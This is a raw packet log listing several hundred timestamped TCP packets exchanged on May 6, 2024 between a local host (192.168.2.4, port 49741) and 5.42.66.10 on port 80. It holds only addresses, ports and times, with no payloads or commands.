May 6, 2024 07:53:05.024060965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024110079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024122000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024132013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024143934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024154902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024158001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024173975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024199009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024199963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024213076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024224997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024235964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024246931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024247885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024259090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024260044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024271965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024283886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024286985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024296045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024307013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024313927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024319887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024332047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024333000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024343014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024350882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024355888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024374962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024394035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024400949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024405956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024418116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024430990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024439096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024444103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024456978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024483919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024529934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024542093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024552107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024563074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024573088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024575949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024585962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024596930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024597883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024609089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024616957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024620056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024635077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024642944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024648905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024662971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024668932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024674892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024686098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024696112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024698973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024714947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024719954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024729967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024739027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024740934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024754047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024765015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024766922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024777889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024782896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024787903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024807930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024808884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024820089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024830103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024832964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024842978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024851084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024854898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024863005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024867058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024878025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024893999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024919033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024919033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024931908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024941921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024955034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024960995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024967909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024979115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024981976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025007963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025032043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025063038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025074959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025084019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025095940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025106907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025108099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025119066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025130033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025135040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025141001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025149107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025154114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025165081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025170088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025176048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025187016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025197029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025199890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025213003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025221109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025226116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025237083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025238991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025249958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025263071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025288105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025289059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025301933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025312901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025324106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025331020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025335073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025348902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025348902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025362015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025372982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025373936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025384903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025398016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025408030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025415897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025419950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025439978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025456905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025468111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025480032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025500059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025511026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025512934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025537014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025548935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025549889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025559902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025580883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025583029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025593042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025598049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025604010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025625944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025629044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025650978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025660992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025672913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025676012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025685072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025707006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025732040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025861025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025871992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025882006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025892973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025903940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025906086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025916100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025927067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025934935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025938034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025940895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025949955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025960922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025970936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.025973082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025984049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.025995970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026000023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026006937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026019096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026022911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026029110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026030064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026043892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026056051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026060104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026067019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026079893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026087046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026091099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026103020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026106119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026114941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026125908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026129961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026138067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026149035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026154995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026159048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026170969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026173115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026184082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026187897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026196003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026207924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026212931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026220083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026232004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026238918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026242971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026257038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026257992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026269913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026282072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026282072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026294947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026307106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026308060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026320934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026349068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026355028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026365995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026376009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026386976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026398897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026400089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026412964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026417971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026424885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026446104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026446104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026458979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026470900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026473045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026482105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026484013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026511908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026530981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026534081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026541948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026552916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026565075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026576042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026576996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026590109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026601076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026602983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026612997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026642084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026668072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026679039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026699066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026710033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026714087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026730061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026740074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026741982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026753902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026765108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026792049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026793957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026806116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026815891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026830912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026839018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026843071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.026856899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.026880026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027002096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027013063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027021885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027031898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027044058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027045965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027055025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027059078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027067900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027079105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027090073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027091026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027102947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027113914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027113914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027127028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027133942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027141094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027153015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027163982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027168989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027174950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027187109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027194977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027215958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027237892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027249098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027260065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027271032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027282000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027293921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027295113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027304888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027314901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027318954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027328014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027338982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027339935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027350903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027352095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027362108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027374029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027379990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027385950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027399063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027410984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027415991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027415991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027440071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027466059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027533054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027548075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027558088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027569056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027580976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027580976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027592897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027604103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027606010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027616024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027625084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027626991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027638912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027643919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027650118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027662039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027667046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027673006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027684927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027695894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027698994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027709961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027713060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027724028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027735949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027738094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.027745962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027760029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.027762890 CEST	49741	80	192.168.2.4	5.42.66.10
